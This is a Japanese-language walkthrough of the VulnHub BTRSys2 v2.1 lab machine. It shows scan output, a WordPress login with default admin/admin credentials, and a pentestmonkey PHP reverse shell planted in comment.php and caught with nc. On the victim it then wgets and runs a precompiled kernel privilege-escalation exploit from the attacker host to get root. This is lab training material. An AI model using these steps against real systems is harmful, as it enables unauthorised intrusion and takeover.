vulnhub BTRSys2 v2.1 雑記
BTRSys2
google driveからのダウンロードファイル解凍後のovfファイルが上手く動かなかった。
vulnhub.comのダウンロードファイルのovfは上手く動いてくれた。
ip取得が上手くいかなかったので、
起動時に「recovery mode」を選択して、「network Enable networking」を選択するとリンクアップした。
サービス調査
# nmap -p- 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT Nmap scan report for 10.10.10.13 Host is up (0.00015s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.13 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT Nmap scan report for 10.10.10.13 Host is up (0.00051s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.3
- [port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.18 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.3
# searchsploit vsftpd ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb ----------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
特に無し。
# ftp 10.10.10.13 Connected to 10.10.10.13. 220 (vsFTPd 3.0.3) Name (10.10.10.13:root): 331 Please specify the password. Password: l530 Login incorrect. Login failed. ftp> ls 530 Please login with USER and PASS.
ログイン必要なので終了。
[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
このバージョン以前にも見たけど、Username Enumerationにしかexploit無いし精度低かった気がする。
終。
[port 80] http Apache httpd 2.4.18 (Ubuntu)
# nikto -h 10.10.10.13 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.13 + Target Hostname: 10.10.10.13 + Target Port: 80 + Start Time: 2020-05-11 07:30:36 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.18 (Ubuntu) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 2 entries which should be manually viewed. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip + Allowed HTTP Methods: OPTIONS, GET, HEAD, POST + OSVDB-3233: /icons/README: Apache default file found. + 7865 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-11 07:31:40 (GMT-4) (64 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
robots.txtが気になる。
# dirb http://10.10.10.13 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon May 11 07:32:16 2020 URL_BASE: http://10.10.10.13/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.13/ ---- + http://10.10.10.13/index.html (CODE:200|SIZE:81) ==> DIRECTORY: http://10.10.10.13/javascript/ + http://10.10.10.13/LICENSE (CODE:200|SIZE:1672) + http://10.10.10.13/robots.txt (CODE:200|SIZE:1451) + http://10.10.10.13/server-status (CODE:403|SIZE:299) ==> DIRECTORY: http://10.10.10.13/upload/ ==> DIRECTORY: http://10.10.10.13/wordpress/ ---- Entering directory: http://10.10.10.13/javascript/ ---- ==> DIRECTORY: http://10.10.10.13/javascript/jquery/ ---- Entering directory: http://10.10.10.13/upload/ ---- ==> DIRECTORY: http://10.10.10.13/upload/account/ ==> DIRECTORY: http://10.10.10.13/upload/admins/ ==> DIRECTORY: http://10.10.10.13/upload/framework/ ==> DIRECTORY: http://10.10.10.13/upload/include/ + http://10.10.10.13/upload/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/languages/ ==> DIRECTORY: http://10.10.10.13/upload/media/ ==> DIRECTORY: http://10.10.10.13/upload/modules/ ==> DIRECTORY: http://10.10.10.13/upload/page/ ==> DIRECTORY: http://10.10.10.13/upload/search/ ==> DIRECTORY: http://10.10.10.13/upload/temp/ ==> DIRECTORY: http://10.10.10.13/upload/templates/ ---- Entering directory: http://10.10.10.13/wordpress/ ---- + http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/ + http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42) ---- Entering directory: http://10.10.10.13/javascript/jquery/ ---- + http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394) ---- Entering directory: http://10.10.10.13/upload/account/ ---- ==> DIRECTORY: http://10.10.10.13/upload/account/css/ + http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/account/templates/ ---- Entering directory: http://10.10.10.13/upload/admins/ ---- ==> DIRECTORY: http://10.10.10.13/upload/admins/access/ ==> DIRECTORY: http://10.10.10.13/upload/admins/addons/ ==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/ ==> DIRECTORY: http://10.10.10.13/upload/admins/groups/ + http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/admins/interface/ ==> DIRECTORY: http://10.10.10.13/upload/admins/languages/ ==> DIRECTORY: http://10.10.10.13/upload/admins/login/ ==> DIRECTORY: http://10.10.10.13/upload/admins/logout/ ==> DIRECTORY: http://10.10.10.13/upload/admins/media/ ==> DIRECTORY: http://10.10.10.13/upload/admins/modules/ ==> DIRECTORY: http://10.10.10.13/upload/admins/pages/ ==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/ ==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/ ==> DIRECTORY: http://10.10.10.13/upload/admins/service/ ==> DIRECTORY: http://10.10.10.13/upload/admins/settings/ ==> DIRECTORY: http://10.10.10.13/upload/admins/start/ ==> DIRECTORY: http://10.10.10.13/upload/admins/support/ ==> DIRECTORY: http://10.10.10.13/upload/admins/templates/ ==> DIRECTORY: http://10.10.10.13/upload/admins/users/ ---- Entering directory: http://10.10.10.13/upload/framework/ ---- ==> DIRECTORY: http://10.10.10.13/upload/framework/functions/ + http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/ ---- + http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/include/yui/ ---- Entering directory: http://10.10.10.13/upload/languages/ ---- + http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/media/ ---- + http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/ ---- + http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/modules/news/ ==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/ ---- Entering directory: http://10.10.10.13/upload/page/ ---- + http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/page/posts/ ---- Entering directory: http://10.10.10.13/upload/search/ ---- + http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/temp/ ---- + http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/temp/search/ ---- Entering directory: http://10.10.10.13/upload/templates/ ---- ==> DIRECTORY: http://10.10.10.13/upload/templates/blank/ + http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ---- + http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/ + http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/ ---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ---- + http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0) ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/ ==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/ ---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/account/css/ ---- + http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/account/templates/ ---- + http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/access/ ---- + http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/addons/ ---- + http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ---- + http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/groups/ ---- + http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/interface/ ---- + http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/languages/ ---- + http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/login/ ---- ==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/ + http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/logout/ ---- + http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/media/ ---- + http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/modules/ ---- + http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/pages/ ---- + http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ---- + http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ---- + http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0) ---- Entering directory: http://10.10.10.13/upload/admins/service/ ---- + http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/settings/ ---- + http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/start/ ---- + http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/support/ ---- + http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/templates/ ---- + http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/admins/users/ ---- + http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/framework/functions/ ---- + http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/yui/ ---- ==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/ + http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488) ==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/ ---- Entering directory: http://10.10.10.13/upload/modules/news/ ---- ==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/ + http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/ ==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/ ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ---- + http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67) ==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/ ==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/ ---- Entering directory: http://10.10.10.13/upload/page/posts/ ---- + http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.13/upload/temp/search/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/templates/blank/ ---- + http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ---- + http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0) + http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ---- + http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0) + http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ---- + http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ---- + http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ---- + http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ---- + http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807) ---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ---- + http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67) + http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889) ---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ---- + http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ---- + http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ---- ==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/ + http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ---- + http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ---- + http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67) ---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ---- + http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67) ----------------- END_TIME: Mon May 11 07:34:12 2020 DOWNLOADED: 267496 - FOUND: 71
珍しく、情報量のとても多いdirb結果。
気になるディレクトリは主に「/upload/」と「/wordpress/」の二つ。
とりあえず、「/robots.txt」を確認する。
# curl 10.10.10.13/robots.txt Disallow: Hackers Allow: /wordpress/ .o+. :o/ -o+` /hh: shh` +hh- /hh: shh` -/: +hh- /hh: shh` +s+ +hh- /hh/............ `....shh-.... ...............` `-` `..............` +hh- .. /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/ oys +ssssssssssssss/ +hh- .+yy- /hh+---------/hh+ .----yhh:---- :hho------------` yhy` oyy------------` +hh- .+yys:` /hh: -hh+ shh` :hh+ yhy` oyy +hh- `.+yys/` /hh: -hh+ shh` :hh+ yhy` oss `-- +hhsssssyhy/` /hh: -hh+ shh` :hh+ yhy` `-. +yy. +hho+++osyy+. /hh: -hh+ shh` :hh+ yhy` +yy. +hh- `/syy+. /hho:::::::::+hh+ shh` :hh+ yhy` .::::::::::::oyy. +hh- `/yyy/` :yyyyyyyyyyyyyyy: +ys` .yy: oys +sssssssssssssss` /ys. `/sy- ``````````````` ` `` ` `````````````` ``
特に新たに得られた情報は無し。
改めてブラウザでホームページに接続してみると何か蠢いているgif
「/upload/」にアクセスすると、
Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'
phpでmysqlの参照に失敗してる?
なんにしろこれ以上は「/upload/」にアクセスできない模様。
では、「/wordpress/」をチェック。
表示したページは本来のwordpressのデザインを読み込めていない?
Log in , admin
「Log in」があるので「admin/admin」でログイン試行。
あーログインできちゃったようなので、Appearance->Editorから簡単にアクセスできそうなphpを弄る。
お好みだけど、reverse-shellをsearch.phpにセットするのが分かりやすくて好き。
reverse-shellはいつもお世話になっているpentestmonkey産。
kaliならば、「/usr/share/webshells/php/php-reverse-shell.php」にある。
ここで、今回は「search.php」が動かなかったため(仕様?)、「comment.php」を改変してreverse-shellした。
window 1 # nc -nlvp 8080
firefoxから任意の記事にpostcommentする。
window 1 Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 14:43:02 up 1:24, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami www-data $
shell getchu!
after shell getchu
kernel exploit
怪しいファイル全く見つからず、cron探しても目ぼしいものは無く。
仕方がないのでkernel exploit狙いでいく。
victim $ uname -a Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker # searchsploit ubuntu 4.4 ----------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------- ---------------------------------------- (snip) Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation | exploits/linux/local/41458.c (snip) Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | exploits/linux/local/44298.c
ささりそうな気がしたやつ。
「41458.c」を試す。
$ cd /tmp $ ls systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU $ wget 10.10.10.3/41458.c --2020-05-11 15:17:10-- http://10.10.10.3/41458.c Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16554 (16K) [text/plain] Saving to: '41458.c' 0K .......... ...... 100% 46.3M=0s 2020-05-11 15:17:10 (46.3 MB/s) - '41458.c' saved [16554/16554] $ ls 41458.c systemd-private-e3dcc1d4513d43829d1acfaa9a909496-systemd-timesyncd.service-y9dsiU $ gcc 41458.c /bin/sh: 7: gcc: not found
えぇ、gcc無いんか。
コンパイル済みをダウンロードするか。
$ wget 10.10.10.3/a.out --2020-05-11 15:18:07-- http://10.10.10.3/a.out Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 23776 (23K) [application/octet-stream] Saving to: 'a.out' 0K .......... .......... ... 100% 68.2M=0s 2020-05-11 15:18:07 (68.2 MB/s) - 'a.out' saved [23776/23776] $ chmod 777 a.out $ ./a.out bash: cannot set terminal process group (1374): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/tmp# id id uid=0(root) gid=0(root) groups=0(root)
ちなみにこの後kernel panic起こした。
ttyでやっちゃったからかなぁ
「/usr/share/exploitdb/exploits/linux/local/44298.c」もroot取れた
こちらはkernel panic起こらず。